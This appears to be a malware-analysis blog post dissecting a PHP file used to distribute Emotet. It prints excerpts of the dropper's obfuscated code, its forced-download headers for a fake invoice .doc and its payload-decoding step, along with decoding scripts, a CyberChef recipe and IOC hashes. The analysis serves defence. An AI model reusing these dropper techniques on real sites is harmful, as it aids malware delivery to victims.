Emotet infection from PHP: generation of a malicious doc

Introduction

During 2020, the Emotet malware distribution was silent between the beginning of February and the middle of July; this was the longest known break for Emotet. After this pause, the email campaigns started again, with multiple vendors reporting that hundreds of thousands of messages were detected every day¹ ².

There is a long list of security researchers on Twitter who are interested in Emotet, with many accounts sharing samples and findings every day. During this summer I started writing multiple threads reporting abused “.it” domains which were used to distribute this malware. While I was working on one of these daily threads, I found something interesting:

This domain was reported on multiple occasions during the summer, and it was first seen at the end of July:

Figure: Screenshot from URLhaus

I downloaded malware.zip and extracted the content. Although the PHP file in this archive is not detected as malicious on VirusTotal, it is actually used to deliver a document containing malicious macros that attempt to infect the machine.

Background

The Emotet malware was first identified in 2014. At that time it acted as banking malware, attempting to steal sensitive data; over the years, however, several features were added, such as malspam distribution and the installation of other malware. Emotet is currently considered one of the most costly threats, affecting not only individuals, but also private organizations and even governments.

The primary distribution method for Emotet is malspam: the malware is able to read the contact list of the infected machine and to replicate itself by sending emails to these contacts. In addition, since the emails are sent from a hijacked account, they look less suspicious to the recipients.

There are multiple infection methods: malicious links, or documents containing macros or scripts. In this case, we will take a look at a PHP file which generates a malicious document containing macros to infect the machine.

Analysis of the PHP downloader

malware.zip contains a single PHP file (index.php), which reports August 25th as its modification date. Before analyzing the PHP file, it’s worth noting that only the archive malware.zip is found on VirusTotal, with 0 detections across the engines and a first submission on September 26th.

Figure: malware.zip on VirusTotal

The PHP file on its own, instead, has 0 matches.

Basic string obfuscation

The first function worth discussing in this analysis is d5f44d5a7878a4(). index.php contains some obfuscated strings to avoid being detected as malicious, and this function is used to de-obfuscate them. Here is the content of the function:

public function d5f44d5a7878a4($s) {
    $string = base64_decode($s);
    return explode('::', $string, 2)[1];
}

We can see that a very basic obfuscation technique was used. The de-obfuscation function decodes the given string with Base64 and then splits the decoded string on the first occurrence of the "::" sequence, producing an array of at most two strings. The return value of d5f44d5a7878a4() is the second element of this array, i.e. everything after the separator.

For instance, d5f44d5a7878a4() is called later in the file in this way:

$qString = $this->d5f44d5a7878a4("TGhDY1VXdENMUT09OjpRVUVSWV9TVFJJTkc=");

Decoding “TGhDY1VXdENMUT09OjpRVUVSWV9TVFJJTkc=” with Base64 we obtain “LhCcUWtCLQ==::QUERY_STRING”, thus the variable $qString will contain “QUERY_STRING”.
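The same decoding can be reproduced outside PHP when triaging the strings. Below is a minimal Python sketch; the name deobfuscate is my own choice, and it assumes that every obfuscated string follows the "prefix::value" layout described above.

```python
import base64


def deobfuscate(encoded: str) -> str:
    """Mirror d5f44d5a7878a4(): Base64-decode, then keep what follows the first '::'."""
    decoded = base64.b64decode(encoded).decode("utf-8", errors="replace")
    # Like explode('::', $string, 2)[1]: split once and return the second part.
    # Unlike PHP, a string without '::' yields an empty result instead of an error.
    _, _, value = decoded.partition("::")
    return value


print(deobfuscate("TGhDY1VXdENMUT09OjpRVUVSWV9TVFJJTkc="))  # QUERY_STRING
```

The random-looking prefix before "::" is simply discarded, so it probably only serves to make the Base64 output of each string look different.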

Entry point

The entry point of index.php is represented by the p5f44d5a786a7c() function. Here are the very first lines:

public function p5f44d5a786a7c()
{
    $qString = $this->d5f44d5a7878a4("TGhDY1VXdENMUT09OjpRVUVSWV9TVFJJTkc=");
    if (!empty($_SERVER[$qString])) {
        return $_SERVER[$qString];
    }

As we saw before, $qString contains “QUERY_STRING”, so the function simply returns the full query string if it’s not empty. If we go on, we will find:

$path = '.' . sha1(basename(dirname(__FILE__)));

if (($fp = fopen($path, 'c+')) !== false) {
    if (flock($fp, LOCK_EX)) {
        $stat = array();
        $fileSize = filesize($path);

        if ($fileSize > 0) {
            $stat = json_decode(fread($fp, $fileSize), true);
        }

The function now opens a hidden file (its name starts with a "."), creating it if it does not exist, and reads any JSON data it already contains. The filename is the SHA-1 hash of the name of the directory containing index.php.
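When hunting for this counter file on a compromised host, it can help to compute the expected name in advance. Here is a small Python sketch of the same derivation; counter_file_name and the example path are hypothetical and only serve as illustration.

```python
import hashlib
import posixpath


def counter_file_name(script_path: str) -> str:
    """Return the hidden file name derived from the directory holding the script."""
    # basename(dirname(__FILE__)) -> name of the directory containing index.php
    directory_name = posixpath.basename(posixpath.dirname(script_path))
    # PHP's sha1() returns a lowercase hex digest; the leading dot hides the file.
    return "." + hashlib.sha1(directory_name.encode("utf-8")).hexdigest()


# Hypothetical path, used only for illustration.
print(counter_file_name("/var/www/html/abc/index.php"))
```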

        $platform = $this->getPlatform();
        if (!isset($stat[$platform]) || !is_int($stat[$platform])) {
            $stat[$platform] = 1;
        } else {
            $stat[$platform]++;
        }

        fseek($fp, 0);
        fwrite($fp, json_encode($stat));
        fflush($fp);
        flock($fp, LOCK_UN);
    }

    fclose($fp);
}

As we can see from the code above, the JSON file is used to count how many visits to the page came from each platform. The getPlatform() function contains the following:

private function getPlatform() {
    // $userAgent = HTTP_USER_AGENT
    $userAgent = (isset($_SERVER[$this->
        d5f44d5a7878a4("YWV6ejFFekE5TE5NbVE9PTo6SFRUUF9VU0VSX0FHRU5U")]) ?
            $_SERVER[$this->
                d5f44d5a7878a4("YWV6ejFFekE5TE5NbVE9PTo6SFRUUF9VU0VSX0FHRU5U")]
            : '');
    $platform = 0; // PLATFORM_UNKNOWN

    if (stripos($userAgent, $this->
        d5f44d5a7878a4("N3VFR0dla2xiZz09Ojp3aW5kb3dz")) !== false) {
        $platform = 4; // PLATFORM_WINDOWS -> windows
    } elseif (stripos($userAgent, $this->
        d5f44d5a7878a4("QlFuRXdiZlRKZz09OjppUGFk")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> iPad
    } elseif (stripos($userAgent, $this->
        d5f44d5a7878a4("V1hMdTYyTUw6OmlQb2Q=")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> iPod
    } elseif (stripos($userAgent, $this->
        d5f44d5a7878a4("N1c3WjVYeld1c0lQZmNnPTo6aVBob25l")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> iPhone
    } elseif (stripos($userAgent, $this->
        d5f44d5a7878a4("NllXNWhXMk43RzR4UURFPTo6bWFj")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> mac
    } elseif (stripos($userAgent, $this->
        d5f44d5a7878a4("V0RvWnVPZE5CZnpiZFdVZU93PT06OmFuZHJvaWQ=")) !== false) {
        $platform = 1; // PLATFORM_ANDROID -> android
    } elseif (stripos($userAgent, $this->
        d5f44d5a7878a4("eVhldjU2RFlYUT09OjpsaW51eA==")) !== false) {
        $platform = 3; // PLATFORM_LINUX -> linux
    } elseif (stripos($userAgent, $this->
        d5f44d5a7878a4("TUU0ZmFKekdiRGFPaU42WDo6d2lu")) !== false) {
        $platform = 4; // PLATFORM_WINDOWS -> win
    } elseif (stripos($userAgent, $this->
        d5f44d5a7878a4("cHJoVk9kN291L3FFN0ZxdTo6aU9T")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> iOS
    }

    return $platform;
}

I have inserted some comments to make it easier to read. The code above inspects the User-Agent header that the browser sends with each request (exposed to PHP as $_SERVER['HTTP_USER_AGENT']) and looks for platform names in it with case-insensitive substring matches. Since there are several options, here is a quick recap of the value returned by getPlatform():

Unknown -> 0
Android -> 1
Apple   -> 2
Linux   -> 3
Windows -> 4
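To check how a given User-Agent would be classified, the matching logic can be reproduced in a few lines. The following Python sketch keeps the same order of checks as getPlatform(); the names PLATFORM_RULES and get_platform are mine, and the sample User-Agent string is only an example.

```python
# Substring checks in the same order as getPlatform(); the first match wins.
PLATFORM_RULES = [
    ("windows", 4),
    ("ipad", 2),
    ("ipod", 2),
    ("iphone", 2),
    ("mac", 2),
    ("android", 1),
    ("linux", 3),
    ("win", 4),
    ("ios", 2),
]


def get_platform(user_agent: str) -> int:
    """Case-insensitive substring match, like stripos() in the PHP code."""
    lowered = user_agent.lower()
    for needle, code in PLATFORM_RULES:
        if needle in lowered:
            return code
    return 0  # PLATFORM_UNKNOWN


print(get_platform("Mozilla/5.0 (Linux; Android 10; SM-G973F)"))  # 1
```

The order matters: Android User-Agent strings usually contain "Linux" as well, so checking "android" before "linux" is what keeps them in the Android bucket.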

Unfortunately I was not able to access the original log file shown in the first screenshot.
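If such a counter file is ever recovered, turning it into something readable is straightforward. This is a hedged Python sketch: summarize_counters and PLATFORM_NAMES are hypothetical names, and the JSON content in the example is made up, since the real file was not available.

```python
import json

PLATFORM_NAMES = {0: "Unknown", 1: "Android", 2: "Apple", 3: "Linux", 4: "Windows"}


def summarize_counters(raw_json: str) -> dict:
    """Map the numeric platform keys of the counter file to readable names."""
    data = json.loads(raw_json)
    # json_encode() emits a JSON list when the PHP array keys are 0..n-1,
    # and an object with string keys otherwise, so accept both shapes.
    items = enumerate(data) if isinstance(data, list) else data.items()
    return {PLATFORM_NAMES.get(int(key), f"code {key}"): count for key, count in items}


# Made-up content, for illustration only.
print(summarize_counters('{"1": 3, "4": 12}'))
```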

The malicious document

The following steps of index.php set a long list of headers. Once again I have added some comments to make the code below easier to read, since the function d5f44d5a7878a4() is used to de-obfuscate the strings for almost all of them.

// Resist Varnish-cache
setcookie(uniqid(), time(), time() + 60, '/');

// Send cache headers
// gmdate("D, d M Y H:i:s") . " GMT"
$timestamp = gmdate($this->
    d5f44d5a7878a4("N0s4eFRuRTBZMkNlenRiemlpWT06OkQsIGQgTSBZIEg6aTpz"))
    . $this->d5f44d5a7878a4("SUZYQlBrOFJ6d20zNFl4cmNFVlY6OiBHTVQ=");

// header("Cache-Control: no-cache, must-revalidate")
header($this->d5f44d5a7878a4(
    "b0taWDZCUDRleW0veVh4WWtXNGQ6OkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGU="));

// header("Pragma: no-cache")
header($this->d5f44d5a7878a4(
    "U29wSEl0YnRiMEU9OjpQcmFnbWE6IG5vLWNhY2hl"));

// header("Last-Modified: " . $timestamp)
header($this->d5f44d5a7878a4(
    "L1VvdkIxND06Okxhc3QtTW9kaWZpZWQ6IA==") . $timestamp);

// header("Expires: " . $timestamp)
header($this->d5f44d5a7878a4(
    "ZU44eGw1T2N2azlUZ1RUTVhNTU86OkV4cGlyZXM6IA==") . $timestamp);

// Send content headers
$contentName = 'INV_O2GT57A7QBKNN7.doc';
$contentType = 'application/msword';

// header("Content-Type: " . $contentType)
header($this->d5f44d5a7878a4(
    "RVpCZ041ZW5TWCtYeE00WGhSRlQ6OkNvbnRlbnQtVHlwZTog") . $contentType);

// header('Content-Disposition: attachment; filename="' . $contentName . '"')
header($this->d5f44d5a7878a4(
    "NUl6QUhHZ2VPcmpnTzJ0VkpZUTQ6OkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSI=")
    . $contentName . '"');

// header("Content-Transfer-Encoding: binary")
header($this->d5f44d5a7878a4(
    "ekFUS003Szl3Zz09OjpDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiBiaW5hcnk="));

It’s also worth noting that $contentName and $contentType (respectively the filename and the file type) are specified in plain text.
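Rather than decoding each string by hand, all the calls to d5f44d5a7878a4() can be extracted from the source and decoded in one pass. Below is a minimal Python sketch of this idea; decode_all and CALL_PATTERN are my own names, and the regular expression assumes that the argument is always a double-quoted Base64 literal, as in the snippets shown in this post.

```python
import base64
import re

# Matches d5f44d5a7878a4("...") even when the argument sits on the next line.
CALL_PATTERN = re.compile(r'd5f44d5a7878a4\(\s*"([A-Za-z0-9+/=]+)"')


def decode_all(php_source: str) -> list:
    """Return the de-obfuscated value of every call found in the source."""
    values = []
    for encoded in CALL_PATTERN.findall(php_source):
        decoded = base64.b64decode(encoded).decode("utf-8", errors="replace")
        values.append(decoded.partition("::")[2])
    return values


sample = '''
header($this->d5f44d5a7878a4(
    "U29wSEl0YnRiMEU9OjpQcmFnbWE6IG5vLWNhY2hl"));
header($this->d5f44d5a7878a4(
    "ekFUS003Szl3Zz09OjpDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiBiaW5hcnk="));
'''
print(decode_all(sample))
```

Running it on the two header lines above returns the "Pragma" and "Content-Transfer-Encoding" headers in clear text.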

The only remaining step is to set the actual content of the malicious document file. This content is hardcoded in the $contentData variable; unfortunately the string is too long to be reported here, but here is a screenshot:

Figure: Just a few lines of the encoded malicious document

The string in $contentData is then used to create the document as follows:

return gzinflate(base64_decode($contentData));

After decoding it with Base64 and inflating the result, the malicious document is ready and the browser used by the victim will prompt the download of a file called INV_O2GT57A7QBKNN7.doc. I have created the following CyberChef³ recipe to replicate this last step from index.php:

From_Base64('A-Za-z0-9+/=',true)
Raw_Inflate(0,0,'Block',false,false)
SHA2('256')

I have included in the recipe an additional step that computes the SHA-256 hash of the file, which can be used to check whether it is known to be malicious.

You can also see the CyberChef recipe by clicking here.
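For those who prefer a script over CyberChef, the same three steps can be sketched in Python. The function name rebuild_document is hypothetical, and the payload used in the example is a stand-in built locally, because the real $contentData string is not reproduced in this post.

```python
import base64
import hashlib
import zlib


def rebuild_document(content_data: str):
    """Base64-decode and raw-inflate the payload, returning (bytes, SHA-256 hex)."""
    compressed = base64.b64decode(content_data)
    # gzinflate() expects a raw DEFLATE stream, hence the negative window bits.
    document = zlib.decompress(compressed, -zlib.MAX_WBITS)
    return document, hashlib.sha256(document).hexdigest()


# Stand-in payload: raw-deflate and Base64-encode a placeholder string.
compressor = zlib.compressobj(wbits=-zlib.MAX_WBITS)
raw = compressor.compress(b"placeholder") + compressor.flush()
demo = base64.b64encode(raw).decode("ascii")

document, digest = rebuild_document(demo)
print(len(document), digest)
```

With the real payload, the bytes can be written to disk for further analysis and the digest compared with the hash of the document listed in the IOCs section.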

The document file obtained at the end of the execution of index.php is clearly malicious: it is detected by multiple engines on VirusTotal, as you can see from the screenshot below:

Figure: VirusTotal detection of the generated document

If you want a sample of the file, you can find it in the MalwareBazaar database following this link.

IOCs

Here is a list of the hashes of files which were analyzed in the post:

malware.zip	db1617dc4a09fe856aea8041b90e73467e8d51ad4bdc1fd9a7e0a3197e66339c
index.php	a48791d0e22ba693529285555ebb559bac1786bd703406deb5e1ef9ee8616cc4
INV_O2GT57A7QBKNN7.doc	a302a49cafa48ab0b8d686124f89eb0517a014f31fcb5dc4eb8b574854fbc0c8

If you want to take a look at the original PHP file, you can find it here.

Conclusion

In this post we analyzed a PHP file used to distribute Emotet, a Trojan that has been active since 2014. We saw how index.php uses some basic obfuscation, especially when setting the headers; it also keeps a per-platform count of the visitors in a JSON file.

At the end of the execution, a malicious document called INV_O2GT57A7QBKNN7.doc is ready for download.

If you are interested in Emotet, follow @Cryptolaemus1 on Twitter and the people in the Cryptolaemus team.

¹ A Comprehensive Look at Emotet’s Summer 2020 Return, Proofpoint
² Emotet botnet returns after a five-month absence, ZDNet
³ CyberChef